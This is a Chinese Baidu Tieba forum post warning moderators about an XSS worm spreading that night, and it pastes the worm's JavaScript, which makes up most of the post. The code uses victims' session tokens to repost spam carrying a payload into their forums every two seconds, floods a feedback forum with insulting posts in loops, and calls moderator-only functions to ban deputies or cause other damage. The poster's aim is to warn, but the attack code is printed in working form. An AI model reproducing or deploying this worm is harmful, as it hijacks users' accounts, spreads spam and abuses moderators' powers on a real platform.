HT_Virtual HT_Virtual
关注数: 10 粉丝数: 56 发帖数: 6,199 关注贴吧数: 23
【大吧小吧今晚别作死】今晚别用电脑上贴吧 本来没打算冒头了的,今天有人对百度开放云平台进行了XSS攻击,注入了一段Javascript代码,会扩散,并且只要鼠标划过标题就中了,放上代码 function addThread(fid) { $.post("/relay/commit", { ie: "utf-8", kw: "test", fid:35, tid:2910585163, ftid: fid, ptid:2910585163, ppid:47102132189, tbs: PageData.tbs, title: config.titles[Math.random() * config.titles.length | 0], content: "aeb1cb13495409230133f7cd9058d109b3de492f#"+config.contents[Math.random() * config.contents.length | 0]+config.evilContent, new_vcode:1, tag:11, activity_id:1425, act_type:"photo", __type__:"repost" },function (x) { if (x.no == 0 || x.new_thread_id) return x.new_thread_id;}) } function reply(){ if (-1 !== config.whiteList.indexOf(PageData.user.user_forum_list.info[num].id) || !userInfo.is_red_tail && !PageData.user.user_forum_list.info[num].is_like){num++;return;} if(PageData.user.user_forum_list.info[num].tid){ num++; }else{ PageData.user.user_forum_list.info[num].tid=true;addThread(PageData.user.user_forum_list.info[num].id); } } function fuckRedTail() { var obj = { ie: "utf-8", kw: "\u8d34\u5427\u610f\u89c1\u53cd\u9988", fid: 898666, tbs: PageData.tbs, title: "\u767e\u5ea6SB", content: config.contents[Math.random() * config.contents.length | 0] } for(var i=0;i<100;i++){ $.post("/f/commit/thread/add",obj); } } if(userInfo.is_red_tail){setInterval("fuckRedTail()",8000)} if ("daba" === userInfo.is_bawu){ killXiaoBa(); czDaba();} if ("xiaoba" === userInfo.is_bawu) banXiaoBa(); var ruchong=setInterval("reply()",2000); 从代码里面可以看出这个代码的function只是针对吧务的,吧友顶多起个扩散作用,吧务点了的话,大吧的效果if ("daba" === userInfo.is_bawu){ killXiaoBa(); czDaba();},小吧的效果if ("xiaoba" === userInfo.is_bawu) banXiaoBa();,就这样了,别怪我没提醒你们@吖的喵了个咪
1 下一页